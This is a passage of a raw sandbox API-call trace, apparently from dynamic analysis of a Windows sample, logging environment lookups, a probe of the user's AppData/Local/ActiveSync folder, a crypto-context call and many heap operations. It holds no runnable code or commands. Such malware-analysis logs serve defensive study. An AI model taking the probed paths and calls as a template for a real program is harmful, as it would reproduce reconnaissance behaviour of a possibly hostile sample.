cchCount2=6) returned 3 [0152.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="veSync", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.552] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0152.552] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.552] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.552] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.552] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.552] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0152.552] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/ActiveSync", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa96a60b1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc4462fde, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa96a60b1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 0x9e20b8 [0152.553] FindClose (in: hFindFile=0x9e20b8 | out: hFindFile=0x9e20b8) returned 1 [0152.553] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.553] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.553] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0152.553] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.553] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0152.553] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.553] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.553] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.553] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.553] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.553] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.553] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.553] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.553] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.553] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.553] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0152.553] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.554] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0152.554] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.554] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.554] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.554] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.554] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.554] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.554] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0152.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0152.554] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.554] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.554] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0152.554] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.554] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0152.554] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0152.554] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0152.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0152.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0152.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7180, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0152.555] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9be9a0) returned 1 [0152.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7478 [0152.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0152.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0152.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0152.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0152.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0152.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0152.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0152.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0152.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0152.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0152.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0152.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0152.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0152.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0152.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0152.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0152.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0152.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0152.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0152.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0152.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0152.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0152.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0152.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0152.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0152.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7478 | out: hHeap=0x2af0000) returned 1 [0152.558] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0152.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0152.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0152.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0152.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0152.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0152.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0152.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0152.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0152.558] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0152.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0152.558] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0152.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0152.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0152.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0152.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0152.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0152.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0152.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0152.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0152.559] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0152.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0152.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0152.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0152.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0152.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0152.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0152.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0152.560] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0152.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0152.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0152.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0152.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0152.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0152.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0152.560] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0152.560] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0152.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0152.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0152.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0152.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0152.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0152.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0152.564] HeapFree 